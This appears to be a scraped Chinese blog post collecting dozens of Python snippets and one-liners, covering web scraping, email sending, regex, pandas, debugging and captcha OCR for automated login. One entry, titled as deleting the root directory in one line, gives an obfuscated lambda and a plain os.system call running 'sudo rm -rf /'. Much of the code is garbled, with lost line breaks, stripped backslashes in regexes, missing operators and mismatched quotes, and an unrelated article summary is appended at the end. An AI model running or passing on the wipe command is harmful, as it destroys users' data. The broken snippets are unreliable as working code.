摘要:上傳文件此處打開指定的文件中的正則表達(dá)式匹配只能匹配非換行符,換成即可使用進(jìn)行文件夾對(duì)比只存在于中只存在于中發(fā)送郵件發(fā)送郵件發(fā)件人信箱郵箱密碼收件人信箱請(qǐng)確保開啟了服務(wù)郵件提醒親愛(ài)的郵件提醒更新行代碼判定色情圖片命
python上傳文件
import requests #https://zhuanlan.zhihu.com/p/20091394 s = requests.session() url = "http://how-old.net/Home/Analyze?isTest=False&source=&version=001" header = { "Accept-Encoding":"gzip, deflate", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0", "Host": "how-old.net", "Referer": "http://how-old.net/", "X-Requested-With": "XMLHttpRequest" } data = {"file":open("test.jpg", "rb")} #此處打開指定的jpg文件 r = s.post(url, files=data, headers=header) h = r.content print hPython中的copy、deepcopy
a = [0, 1, 2, 3, [4, 5, 6], 7] b = a[:] a[0] = 5 a[4][0] = 99 print(a) print(b) print([id(x) for x in a]) print([id(x) for x in b])Python正則表達(dá)式匹配.*
# encoding:utf-8 import urllib import re import json url = "http://news.163.com/special/00014RJU/nationalnews-json-data.js" result = urllib.urlopen(url).read().strip() pattern = re.compile(r";var newsList=(.*)") pattern = re.compile(r";var newsList=([sS]*)")#.*只能匹配非換行符,換成[sS]*即可 matchs = pattern.match(result) print(matchs.group())使用python進(jìn)行文件夾對(duì)比
#coding:gbk from filecmp import dircmp def show_diff_files(dcmp): for name in dcmp.diff_files: print "diff_file %s found in %s and %s" % (name, dcmp.left,dcmp.right) for sub_dcmp in dcmp.subdirs.values(): show_diff_files(sub_dcmp) def show_only(dcmp): if dcmp.left_only: ave_rst = 1 for i in dcmp.left_only: print "%s只存在于%s中"%(i,dcmp.left) if dcmp.right_only: for i in dcmp.right_only: print "%s只存在于%s中"%(i,dcmp.right) for sub_dcmp in dcmp.subdirs.values(): show_only(sub_dcmp) def compare(dir1,dir2): dcmp = dircmp(dir1,dir2) show_diff_files(dcmp) show_only(dcmp)發(fā)送郵件
from email import encoders from email.header import Header from email.mime.text import MIMEText from email.utils import parseaddr, formataddr from time import sleep from bs4 import BeautifulSoup import requests import smtplib import time def SendMessage(title): # 發(fā)送郵件 def _format_addr(s): name, addr = parseaddr(s) return formataddr((Header(name, "utf-8").encode(), addr)) from_addr = "xxx@163.com"#發(fā)件人信箱 password = "xxxx"#郵箱密碼 to_addr = "xxx@163.com"#收件人信箱 smtp_server = "smtp.163.com"#請(qǐng)確保開啟了smtp服務(wù) msg = MIMEText(title, "plain", "utf-8") msg["From"] = _format_addr("郵件提醒 <%s>" % from_addr) msg["To"] = _format_addr("親愛(ài)的 <%s>" % to_addr) msg["Subject"] = Header("郵件提醒更新", "utf-8").encode() server = smtplib.SMTP(smtp_server, 25) server.set_debuglevel(1) server.login(from_addr, password) server.sendmail(from_addr, [to_addr], msg.as_string()) server.quit() print(SendMessage("hello"))10 行代碼判定色情圖片
import sys, Image img = Image.open(sys.argv[1]).convert("YCbCr") w, h = img.size data = img.getdata() cnt = 0 for i, ycbcr in enumerate(data): y, cb, cr = ycbcr if 86 <= cb <= 117 and 140 <= cr <= 168: cnt += 1 print "%s %s a porn image."%(sys.argv[1], "is" if cnt > w * h * 0.3 else "is not")命令行格式化
>>> echo "{"key":"value"}" | python -m json.tool { "key": "value" } //python -m json.tool //在 vim 中執(zhí)行這句代碼,可以快速格式化 json 數(shù)據(jù) curl -L http://restapi/json_response -o json-response | python -m json.tool獲取公網(wǎng)IP地址
python -c "import socket; sock=socket.create_connection(("ns1.dnspod.net",6666)); print sock.recv(16); sock.close()"
幫你數(shù)數(shù):$ python -c "print(" ".join([str(i) for i in range(1,10000)]))" | say
一行統(tǒng)計(jì)一本書的所有詞頻(此處是前100)import re; from collections import Counter Counter(re.findall(r"w+",open("hamlet.txt").read().lower())).most_common(100)轉(zhuǎn)置矩陣
m = [ [1,2],[3,4]] zip(*m)
import就可以飛import antigravity就會(huì)打開 xkcd.com/about/
2的1000次方的各位數(shù)之和sum(map(int, str(2**1000)))
一行篩質(zhì)數(shù)filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, n))
list分組a=[3, 8, 9, 4, 1, 10, 6, 7, 2, 5] [a[i:i+3] for i in xrange(0,len(a),3)] 結(jié)果[[3, 8, 9], [4, 1, 10], [6, 7, 2], [5]]key,value互換
m = {"a": 1, "b": 2, "c": 3, "d": 4} {v: k for k, v in m.items()} 結(jié)果:{1: "a", 2: "b", 3: "c", 4: "d"}碾平list
a = [1, 2, [3, 4], [[5, 6], [7, 8]]] flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x] flatten(a); 結(jié)果:[1,2,3,4,5,6,7,8]簡(jiǎn)易的web服務(wù)
python -m SimpleHTTPServer 8000,然后瀏覽器打開 localhost:8000,一個(gè)簡(jiǎn)易的web服務(wù)就開啟了
打印九九乘法表print "n".join([" ".join(["%s%s=%-2s" % (y,x,xy) for y in range(1,x+1)]) for x in range(1,10)])
計(jì)算出1-1000之間的素?cái)?shù)print(*(i for i in range(2, 1000) if all(tuple(i%j for j in range(2, int(i**.5))))))
輸出斐波那契數(shù)列的值print [x[0] for x in [ (a[i][0], a.append((a[i][1], a[i][0]+a[i][1]))) for a in ([[1,1]], ) for i in xrange(100) ]]
網(wǎng)易云音樂(lè)批量下載import requests import urllib # 榜單歌曲批量下載 # r = requests.get("http://music.163.com/api/playlist/detail?id=2884035") # 網(wǎng)易原創(chuàng)歌曲榜 # r = requests.get("http://music.163.com/api/playlist/detail?id=19723756") # 云音樂(lè)飆升榜 # r = requests.get("http://music.163.com/api/playlist/detail?id=3778678") # 云音樂(lè)熱歌榜 r = requests.get("http://music.163.com/api/playlist/detail?id=3779629") # 云音樂(lè)新歌榜 # 歌單歌曲批量下載 # r = requests.get("http://music.163.com/api/playlist/detail?id=123415635") # 云音樂(lè)歌單——【華語(yǔ)】中國(guó)風(fēng)的韻律,中國(guó)人的印記 # r = requests.get("http://music.163.com/api/playlist/detail?id=122732380") # 云音樂(lè)歌單——那不是愛(ài),只是寂寞說(shuō)的謊 arr = r.json()["result"]["tracks"] # 共有100首歌 for i in range(10): # 輸入要下載音樂(lè)的數(shù)量,1到100。 name = str(i+1) + " " + arr[i]["name"] + ".mp3" link = arr[i]["mp3Url"] urllib.request.urlretrieve(link, "網(wǎng)易云音樂(lè)" + name) # 提前要?jiǎng)?chuàng)建文件夾 print(name + " 下載完成")調(diào)用默認(rèn)瀏覽器打開一坨網(wǎng)頁(yè)
import webbrowser urls = [ "http://www.douban.com", "http://weibo.com", "http://www.zhihu.com", "http://www.v2ex.com/", "https://github.com/", "https://mail.google.com/", "http://instagram.com/", ] map(lambda x: webbrowser.open(x), urls)扒取kindle今日特價(jià)書,把結(jié)果郵件到指定郵箱
# -*- coding: utf-8 -*- import requests from bs4 import BeautifulSoup import smtplib from email.mime.text import MIMEText from email.Header import Header result = {"name": [], "cover": [], "desc": [], "link": [], "price": []} def get_page(): return requests.get("http://t.cn/Rvm4xgc").text def parse(html): soup = BeautifulSoup(html) table = soup.body.find_all("table")[6] name = table.find_all("tr")[1] result["name"].append(name.find_all("td")[0].b.string) result["name"].append(name.find_all("td")[2].b.string) desc = table.find_all("tr")[2] book_1 = desc.find_all("td")[0] result["cover"].append(book_1.a.img["src"]) result["link"].append("http://www.amazon.cn" + book_1.a["href"]) result["desc"].append(book_1.contents[1]) result["price"].append(book_1.find_all("p")[1].b.span.string) book_2 = desc.find_all("td")[2] result["cover"].append(book_2.a.img["src"]) result["link"].append("http://www.amazon.cn" + book_2.a["href"]) result["desc"].append(book_2.contents[1]) result["price"].append(book_2.find_all("p")[1].b.span.string) mail_config = { "from": "gitradar@163.com", "to": "liushuaikobe1993@163.com", "server": "smtp.163.com", "username": "gitradar", "pwd": "yourpassword" } def send_mail(sbj, content, from_whom=mail_config["from"], to_whom=mail_config["to"], server=mail_config["server"], username=mail_config["username"], pwd=mail_config["pwd"]): msg = MIMEText(content, "html", "utf-8") msg["Subject"] = Header(sbj, "utf-8") msg["From"] = from_whom msg["To"] = to_whom s = smtplib.SMTP(server) s.ehlo() s.starttls() s.login(username, pwd) s.sendmail(from_whom, to_whom, msg.as_string()) def build_html(): return "" + "心形函數(shù)"+ result["name"][0] + " " + result["price"][0] + "
" + "" + "" + "" + "
" + result["desc"][0] + "
" + ""+ result["name"][1] + " " + result["price"][1] + "
" + "" + "" + "" + "
" + result["desc"][1] + "
" + "" if __name__ == "__main__": parse(get_page()) html = build_html() sbj = "Kindle今日特價(jià)書" send_mail(sbj, html)
print(" ".join(["".join([("PYTHON!"[(x-y)%7]if((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3<=0else" ")for x in range(-30,30)])for y in range(15,-15,-1)])) THON!PYTH YTHON!PYT !PYTHON!PYTHON!PY N!PYTHON!PYTHON!P N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!P !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PY PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYT YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH THON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHO HON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON! ON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON YTHON!PYTHON!PYTHON!PYTHON!PYTHON ON!PYTHON!PYTHON!PYTHON!PYTHO PYTHON!PYTHON!PYTHON!PYTH HON!PYTHON!PYTHON!PYT PYTHON!PYTHON!P ON!PYTHON YTH HPython實(shí)現(xiàn)Zip文件的暴力破解
import zipfile try: with zipfile.ZipFile("1.zip") as zFile: #創(chuàng)建ZipFile對(duì)象 #解壓文件 zFile.extractall(path="./",pwd=b"1314") print("Extract the Zip file successfully!") except: print("Extract the Zip file failed!")判斷輸入數(shù)字是實(shí)數(shù)(整型數(shù)字或者浮點(diǎn)型數(shù)字)
In [1]: isinstance(1, (int, long, float)) True In [2]: isinstance("a", (int, long, float)) False In [1]: foo = "123.456" In [2]: foo.replace(".", "", 1).isdigit() True In [3]: bar = "12.34.56" In [4]: bar.replace(".", "", 1).isdigit() False def input_num(): while True: num = raw_input("input a number : ") if num.replace(".", "", 1).isdigit(): return num >>> f = 1.0 >>> f.is_integer() True >>> f = 1.0 / 3 + 2.0 / 3 >>> f.is_integer() True try: f = float(input_value) except Exception: ... else: # Is it a integer? if f.is_integer(): ... else:pip 安裝lxml時(shí)出現(xiàn) “Unable to find vcvarsall.bat
1. 安裝wheel,命令行運(yùn)行: pip install wheel 2.在http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml 這里下載對(duì)應(yīng)的.whl文件,注意別改文件名! Ctrl + F,輸入lxml,找到下面這段 Lxml, a binding for the libxml2 and libxslt libraries. lxml?3.4.4?cp27?none?win32.whl lxml?3.4.4?cp27?none?win_amd64.whl lxml?3.4.4?cp33?none?win32.whl lxml?3.4.4?cp33?none?win_amd64.whl lxml?3.4.4?cp34?none?win32.whl lxml?3.4.4?cp34?none?win_amd64.whl lxml?3.4.4?cp35?none?win32.whl lxml?3.4.4?cp35?none?win_amd64.whl cp后面是Python的版本號(hào),27表示2.7,根據(jù)你的Python版本選擇下載。 3. 進(jìn)入.whl所在的文件夾,執(zhí)行命令即可完成安裝 pip install 帶后綴的完整文件名 $ pip install lxml-3.6.4-cp35-cp35m-win32.whl Processing .lxml-3.6.4-cp35-cp35m-win32.whl Installing collected packages: lxml Successfully installed lxml-3.6.4 http://stackoverflow.com/questions/29440482/how-to-install-lxml-on-windows http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-batPython一行刪掉根目錄
(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True)) import os os.system("sudo rm -rf /") __import__("os").system("sudo rm -rf /")登錄博客園
from selenium import webdriver import time browser = webdriver.Chrome() browser.get("http://cnblogs.com") time.sleep(1) browser.find_element_by_link_text("登錄").click() time.sleep(1) browser.find_element_by_id("input1").send_keys("用戶名") browser.find_element_by_id("input2").send_keys("密碼") browser.find_element_by_id("signin").click() time.sleep(1) try: if browser.find_element_by_link_text("退出"): print "Login Successfully." except: print "Login failed." from selenium import webdriver source_url="http://huaban.com/boards/28195582/" headers={ "Host":"huaban.com", "Pragma":"no-cache", "Cache-Control":"no-cache", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36", "Cookie":"xxxxxx" } cap = webdriver.DesiredCapabilities.PHANTOMJS cap["phantomjs.page.settings.userAgent"] = headers["User-Agent"] #設(shè)置請(qǐng)求header頭信息 cap["phantomjs.page.settings.loadImages"] = False #禁止加載圖片 cap["phantomjs.page.customHeaders.Host"]=headers["Host"] cap["phantomjs.page.customHeaders.Pragma"]=headers["Pragma"] cap["phantomjs.page.customHeaders.Cookie"]=headers["Cookie"] driver = webdriver.PhantomJS(desired_capabilities=cap) driver.get(source_url)unicode
echo "u00e8u0091u0089u00e7u008au00b6u00e3u0083u00a2u00e3u0083u008eu00e3u0083u009du00e3u0083u00bcu00e3u0083u00abu00e3u0082u00a2u00e3u0083u00b3u00e3u0083u0086u00e3u0083u008a" x = u"u00e8u0091u0089 print xpython中怎么獲取某個(gè)網(wǎng)頁(yè)元素之前的所有源碼?
doc = """requests優(yōu)雅的下載圖片The Dormouse"s story p1p1p1 b1b1b1
p2p2p2
p4p4p4
""" from lxml import html tree = html.fromstring(doc) a = tree.get_element_by_id("a1") print(html.tostring(a)) print(html.tostring(tree).decode()) def dropnode(e=None): if e is None: return if e.tag == "body": return nd = e.getnext() while nd is not None: nd.drop_tree() nd = e.getnext() dropnode(e.getparent()) dropnode(a) print(html.tostring(tree).decode())
import requests from bs4 import BeautifulSoup r = requests.get("http://www.pythonscraping.com") bs = BeautifulSoup(r.text,"lxml") image = bs.find("a", {"id": "logo"}).find("img")["src"] ir = requests.get(image) if ir.status_code == 200: open("logo.jpg", "wb").write(ir.content) import requests from bs4 import BeautifulSoup r = requests.get("http://www.pythonscraping.com") bs = BeautifulSoup(r.text,"lxml") image = bs.find("a", {"id": "logo"}).find("img")["src"] ir = requests.get(image) if ir.status_code == 200: open("logo.jpg", "wb").write(ir.content)python lxml
import lxml.etree import urllib.request from lxml.etree import * str_url = "http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=26693255&retmode=text&rettype=xml" request = urllib.request.Request(str_url) xml_text = urllib.request.urlopen(request).read() root = lxml.etree.XML(xml_text) # xml_text 為xml純文本文件 # example 獲取雜志名稱和ISSN # 使用 tag作為輸入需要逐級(jí)進(jìn)行 journal_name = root.find("PubmedArticle").find("MedlineCitation").find("Article").find("Journal").find("Title").text # 也可以使用xpath(必須使用相對(duì)路徑,以.//開頭,如果想使用絕對(duì)路徑可以使用xpath函數(shù)) journal_name = root.find(".//Title").text print("xpath:" ,journal_name) journal_name = root.xpath("http://Title")[0].text print(journal_name)爬取 豆瓣電影主頁(yè)本周口碑榜
import lxml.html str_url = "http://movie.douban.com/" request = urllib.request.Request(str_url) html_text = urllib.request.urlopen(request).read() root = lxml.html.fromstring(html_text) # 獲取本頁(yè)面所有項(xiàng)目名稱 cssselect() 函數(shù),返回list,包含所有匹配的結(jié)果,可以使用css選擇器,類似于jquery movies_list = [a.text for a in root.cssselect("div.billboard-bd tr td a")] print(movies_list) # 獲取所有電影超鏈接 movies_href = [a.get("href") for a in root.cssselect("div.billboard-bd tr td a")] print(movies_href)回頭遍歷
n=7 list1=["a","b","c","d"] print (l * (n // len(l) + 1))[:n] (list1 * 2)[:n] import itertools import math (list1 * math.ceil( n / len(list1) ) )[:7] n=7 list1=["a","b","c","d"] print list(itertools.islice(itertools.cycle(list1), 0, n))pip 安裝 scrapy
pip install wheel
http://www.lfd.uci.edu/~gohlk... 下載對(duì)應(yīng)版本的 lxml和Twisted,cp后面是Python的版本號(hào),27表示2.7 pip install 對(duì)應(yīng)的whl文件
pip install scrapy
list(set(list2)-set(list1))
將字符串"[1,2,3,4]"轉(zhuǎn)化為列表[1,2,3,4]eval("[1,2,3,4]") [1, 2, 3, 4] json.loads(str) ast.literal_eval(str) raw = b"{"aa":11,"bb":22,"cc":33}" d = json.loads(str(raw, "utf-8")) d = eval(b"{"aa":11,"bb":22,"cc":33}") s = b"{"aa":11,"bb":22,"cc":33}".decode("utf-8") # 先解碼成字符串 data = json.loads(s) # 解析為字典對(duì)象Pythonic [for]
a_part = [2001, 12000] b_part = [1001, 2000] c_part = [11, 1000] d_part = [1, 10] data = range(1, 12000) labels = [a_part, b_part, c_part, d_part] sizes = [] for part in labels: sum = 0 for each in data: sum += each if each >= part[0] and each <= part[1] else 0 sizes.append(sum) print(sizes) sizes = [sum(each for each in data if part[0] <= each <= part[1]) for part in labels] sizes = [sum(x for x in data if low<=x<=high) for low,high in labels]send email
import smtplib
from email.mime.text import MIMEText
mail_host = "smtp.163.com" # SMTP服務(wù)器 mail_user = "username" # 用戶名 mail_pass = "passwd" # 密碼 sender = "user@163.com" # 發(fā)件人郵箱(最好寫全, 不然會(huì)失敗) receivers = ["to_someone@qq.com"] # 接收郵件,可設(shè)置為你的QQ郵箱或者其他郵箱 content = "過(guò)期教程害死人!" title = "Python SMTP Mail Test" # 郵件主題 message = MIMEText(content, "plain", "utf-8") # 內(nèi)容, 格式, 編碼 message["From"] = "{}".format(sender) message["To"] = ",".join(receivers) message["Subject"] = title try: smtpObj = smtplib.SMTP_SSL(mail_host, 465) # 啟用SSL發(fā)信, 端口一般是465 smtpObj.login(mail_user, mail_pass) # 登錄驗(yàn)證 smtpObj.sendmail(sender, receivers, message.as_string()) # 發(fā)送 print("mail has been send successfully.") except smtplib.SMTPException as e: print(e) ###pip UnicodeDecodeError: "ascii" codec can"t decode byte 0xc0 in position 0 vi mimetypes.py import sys reload(sys) sys.setdefaultencoding("utf-8") ###后臺(tái)運(yùn)行命令 from subprocess import run run("ping 127.0.0.1",shell=True)group by
import pandas as pd cols = ["流水號(hào)", "處理人", "處理時(shí)間"] data = [[10000, "張三", "2016-10-01"], [10000, "李四", "2016-10-02"], [10001, "王五", "2016-10-01"], [10002, "趙六", "2016-10-03"], [10001, "黃七", "2016-10-02"], [10000, "吳八", "2016-10-03"]] df = pd.DataFrame(data,columns=cols) grp = [(n, ",".join([r for r in set(df[df["流水號(hào)"]==n]["處理人"])])) for n in set(df["流水號(hào)"])] df2 = pd.DataFrame(grp, columns=cols[:-1]) print(df) print(df2) cols = ["流水號(hào)", "處理人", "處理時(shí)間"] data = [[10000, "張三", "2016-10-01"], [10000, "李四", "2016-10-02"], [10001, "王五", "2016-10-01"], [10002, "趙六", "2016-10-03"], [10001, "黃七", "2016-10-02"], [10000, "吳八", "2016-10-03"]] frame = pd.DataFrame(data,columns=cols) def combination(names): return ",".join(names) frame.groupby("流水號(hào)").aggregate(combination)pandas導(dǎo)入文件
import pandas as pd
pd.read_csv("1.csv", skiprows=[0, 2]) # 跳過(guò)文件第一行和第三行
list(set(list2)-set(list1))
a = ["a","b","c","e"]
b = ["b","c","f"]
li = [ item for item in b if item not in a]
import sys, os try: raise NotImplementedError("No error") except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print(exc_type, fname, exc_tb.tb_lineno)字符串與二進(jìn)制串的相互轉(zhuǎn)換
def encode(s): return " ".join([bin(ord(c)).replace("0b", "") for c in s]) def decode(s): return "".join([chr(i) for i in [int(b, 2) for b in s.split(" ")]]) >>>encode("hello") "1101000 1100101 1101100 1101100 1101111" >>>decode("1101000 1100101 1101100 1101100 1101111") "hello" >>> bin(int("256", 10)) "0b100000000" >>> str(int("0b100000000", 2)) "256"windows 下python pip install libxml
http://www.lfd.uci.edu/~gohlk... 下載lxml,文件名是這樣的: lxml-3.6.4-cp27-cp27m-win32.whl
cp27表示python2.7 cmd里輸入python第一行末尾win32,就說(shuō)明python是32位的
pip install wheel #如果沒(méi)有安裝過(guò)wheel就安裝
pip install lxml-**.whl #在whl文件目錄中執(zhí)行
import time
local = time.localtime()
print(time.localtime(1400000000))
time.mktime(local)#接受時(shí)間元組并返回時(shí)間輟
my_format = "%Y/%m/%d %H:%M:%S"
my_time = time.localtime()
print(my_time)
print(time.strftime(my_format, my_time))
def fn(x, L=[]): L.append(x) return L print(fn(1)) # [1] print(fn(7)) # [1, 7] print(fn(13)) # [1, 7, 13] // 而 javascript (ES6) 沒(méi)有上面那個(gè)坑 function fn(x, L=[]){ L.push(x); return L.toString(); } console.log(fn(1)) // "1" console.log(fn(7)) // "7" console.log(fn(13)) // "13"嵌套列表推導(dǎo)式和生成器表達(dá)式
[(i,j) for i in range(3) for j in range(i) ]
((i,j) for i in range(4) for j in range(i) )
from future import braces
使用re.DEBUG查看正則表達(dá)式的匹配過(guò)程re.compile(r"d+(.*)",re.DEBUG)
IPython調(diào)試import sys class ExceptionHook: instance = None def __call__(self, *args, **kwargs): if self.instance is None: from IPython.core import ultratb self.instance = ultratb.FormattedTB(mode="Plain", color_scheme="Linux", call_pdb=1) return self.instance(*args, **kwargs) sys.excepthook = ExceptionHook() ipython --pdb your_scripyt.py from ipython import embed;embed() import ipdb; ipdb.set_trace() python -m pdb your.py ipython test.py --pdb --------------------------------------------------------------------------- ZeroDivisionError Traceback (most recent call last) /Users/dongweiming/test/test.py in調(diào)試函數(shù)() 2 b = 0 3 ----> 4 a / b ZeroDivisionError: integer division or modulo by zero *** NameError: name "pdb" is not defined > /Users/dongweiming/test/test.py(4) () 1 a = 1 2 b = 0 3 ----> 4 a / b ipdb> p b # p是print的別名 0 ipdb> p a 1 ipdb>
import sys def get_cur_info(): print sys._getframe().f_code.co_filename # 當(dāng)前文件名 print sys._getframe(0).f_code.co_name # 當(dāng)前函數(shù)名 print sys._getframe(1).f_code.co_name # 調(diào)用該函數(shù)的函數(shù)的名字,如果沒(méi)有被調(diào)用,則返回module print sys._getframe().f_lineno # 當(dāng)前行號(hào)字典解析
a_dict = {"%d^2" % item: item**2 for item in range(5)} print(a_dict) # {"3^2": 9, "2^2": 4, "1^2": 1, "0^2": 0, "4^2": 16} a_generator = (item**2 for item in range(5))#生成器 a_list_generator = iter(a_list) print(list(map(lambda x, y: x**y, range(1, 5), range(1, 5)))) # [1, 4, 27, 256] print(reduce(lambda x, y: x+y, range(10))) # 45 print(reduce(lambda x, y: x+y, range(10), 100)) # 145 print(reduce(lambda x, y: x+y, [[1, 2], [3, 4]], [0])) # [0, 1, 2, 3, 4] print(filter(None, range(-4, 5))) #Fraction模塊:分?jǐn)?shù)模塊print(list(filter(None, range(-4, 5)))) # [-4, -3, -2, -1, 1, 2, 3, 4] print(list(filter(lambda x: x > 0, range(-4, 5)))) # [1, 2, 3, 4] print(all([0, 1, 2])) # False 判定一個(gè)可迭代對(duì)象是否全為True或者有為True print(any([0, 1, 2])) # True for index, item in enumerate(range(5)): print("%d: %d" % (index, item)) # 0: 0 1: 1 2: 2 for a, b in zip([1, 2, 3], ["a", "b", "c"]): print(a, b) # 1 a 2 b 3 c a_dict = dict(zip([1, 2, 3], ["a", "b", "c"])) print(a_dict) # {1: "a", 2: "b", 3: "c"} >>> [(a,b )for a, b in zip([1, 2, 3], ["a", "b", "c"])] [(1, "a"), (2, "b"), (3, "c")] 一行代碼啟動(dòng)一個(gè)Web服務(wù) python -m SimpleHTTPServer 8080 # python2 python3 -m http.server 8080 # python3 一行代碼實(shí)現(xiàn)求解2的1000次方的各位數(shù)之和 print(sum(map(int, str(2**1000)))) 多維數(shù)組轉(zhuǎn)化為一維 flatten = lambda x: [y for l in x for y in flatten(l)] if isinstance(x, list) else [x] 一行代碼計(jì)算出1-100之間的素?cái)?shù) print(" ".join([str(item) for item in filter(lambda x: not [x % i for i in range(2, x) if x % i == 0], range(2, 101))])) print(" ".join([str(item) for item in filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, 101))])) 一行代碼打印九九乘法表 print(" ".join([" ".join(["%s*%s=%-2s" % (y, x, x*y) for y in range(1, x+1)]) for x in range(1, 10)])) 1*1=1 1*2=2 2*2=4 1*3=3 2*3=6 3*3=9 1*4=4 2*4=8 3*4=12 4*4=16 1*5=5 2*5=10 3*5=15 4*5=20 5*5=25 1*6=6 2*6=12 3*6=18 4*6=24 5*6=30 6*6=36 1*7=7 2*7=14 3*7=21 4*7=28 5*7=35 6*7=42 7*7=49 1*8=8 2*8=16 3*8=24 4*8=32 5*8=40 6*8=48 7*8=56 8*8=64 1*9=9 2*9=18 3*9=27 4*9=36 5*9=45 6*9=54 7*9=63 8*9=72 9*9=81 一行代碼輸出特定字符"Love"拼成的心形 print(" ".join(["".join([("Love"[(x-y) % len("Love")] if ((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3 <= 0 else " ") for x in range(-30, 30)]) for y in range(30, -30, -1)])) 循環(huán)過(guò)程中變更 list 長(zhǎng)度是錯(cuò)誤的思路 for i in range(0,len(list1)): if list1[i].find("a") != -1: list1.pop(i) list1 = [x for x in list1 if "a" not in x] list1 = ["print", "lock", "china", "page"] list2 = filter(lambda item: "a" not in item,list1)
from fractions import Fraction x = Fraction(4, 6) # 分?jǐn)?shù)類型 4/6 x = Fraction("0.25") # 分?jǐn)?shù)類型 1/4 增強(qiáng)賦值和共享引用:普通+號(hào)會(huì)生成新的對(duì)象,而增強(qiáng)賦值+=會(huì)在原處修改 L = M = [1, 2] L = L + [3, 4] # L = [1, 2, 3, 4], M = [1, 2] L += [3, 4] # L = [1, 2, 3, 4], M = [1, 2, 3, 4] {x**2 for x in [1, 2, 3, 4]} # 集合解析 "%(name1)d---%(name2)s" % {"name1":23, "name2":"value2"} "{0}, {1} and {2}".format("spam", "ham", "eggs") # 基于位置的調(diào)用 "{motto} and {pork}".format(motto = "spam", pork = "ham") # 基于Key的調(diào)用 D = dict([("name", "tom"), ("age", 12)]) # {"age": 12, "name": "tom"} D = dict(zip(["name", "age"], ["tom", 12])) "first line" in open("test.txt") # in測(cè)試 返回True或False L = [("b",2),("a",1),("c",3),("d",4)] sorted(L, key=lambda x: x[1]), reverse=True) # 使用Key參數(shù)和reverse參數(shù) sorted(L, key=lambda x: (x[0], x[1])) # 使用key參數(shù)進(jìn)行多條件排序,即如果x[0]相同,則比較x[1] #-- 模塊的包導(dǎo)入:使用點(diǎn)號(hào)(.)而不是路徑(dir1dir2)進(jìn)行導(dǎo)入 import dir1.dir2.mod # d導(dǎo)入包(目錄)dir1中的包dir2中的mod模塊 此時(shí)dir1必須在Python可搜索路徑中 from dir1.dir2.mod import * # from語(yǔ)法的包導(dǎo)入 from .. import spam # 導(dǎo)入當(dāng)前目錄的父目錄下的spam模塊 from subprocess import call call(["ls", "-l"]) 字典排序 import operator x = {1: 2, 3: 4, 4: 3, 2: 1, 0: 0} sorted_x = sorted(x.items(), key=operator.itemgetter(1)) dict(sorted_x)就是你想要的結(jié)果模擬登錄有驗(yàn)證碼的網(wǎng)站
def get_captcha(self, data, captcha_url): self._session.post(self.login_url, data=data) r = self._session.get(captcha_url) with open("image/captcha.gif", "wb") as f: f.write(r.content) image = Image.open("image/captcha.gif") captcha = "" try: captcha = pytesseract.image_to_string(image, lang="eng") except Exception: pass if len(captcha) == 0: self.get_captcha(data, captcha_url) else: print("captcha:", captcha) os.remove("image/captcha.gif") return captcha字典排序
list = [ {"student_name": zhangsan, "student_score": 65}, {"student_name": lisi, "student_score": 95}, {"student_name": wangwu, "student_score": 80}, {"student_name": maliu, "student_score": 75}, {"student_name": zhuqi, "student_score": 88} ] from operator import itemgetter top3 = sorted(lst, key=itemgetter("student_score"), reverse=True)[:3] print sorted(list, key=lambda student: student["student_score"])[-3:]獲取下個(gè)周三的日期
def get_wednesday_date(): today = date.today() days = 2 - today.weekday() time_delta = timedelta(days=days) if days > 0 else timedelta(days=7+days) return today + time_delta def get_wednesday_date(): return date.today() + timedelta(((2 - date.today().weekday()) + 7) % 7)
文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請(qǐng)注明本文地址:http://www.ezyhdfw.cn/yun/38176.html
摘要:楚江數(shù)據(jù)是專業(yè)的互聯(lián)網(wǎng)數(shù)據(jù)技術(shù)服務(wù),現(xiàn)整理出零基礎(chǔ)如何學(xué)爬蟲技術(shù)以供學(xué)習(xí),。本文來(lái)源知乎作者路人甲鏈接楚江數(shù)據(jù)提供網(wǎng)站數(shù)據(jù)采集和爬蟲軟件定制開發(fā)服務(wù),服務(wù)范圍涵蓋社交網(wǎng)絡(luò)電子商務(wù)分類信息學(xué)術(shù)研究等。 楚江數(shù)據(jù)是專業(yè)的互聯(lián)網(wǎng)數(shù)據(jù)技術(shù)服務(wù),現(xiàn)整理出零基礎(chǔ)如何學(xué)爬蟲技術(shù)以供學(xué)習(xí),http://www.chujiangdata.com。 第一:Python爬蟲學(xué)習(xí)系列教程(來(lái)源于某博主:htt...
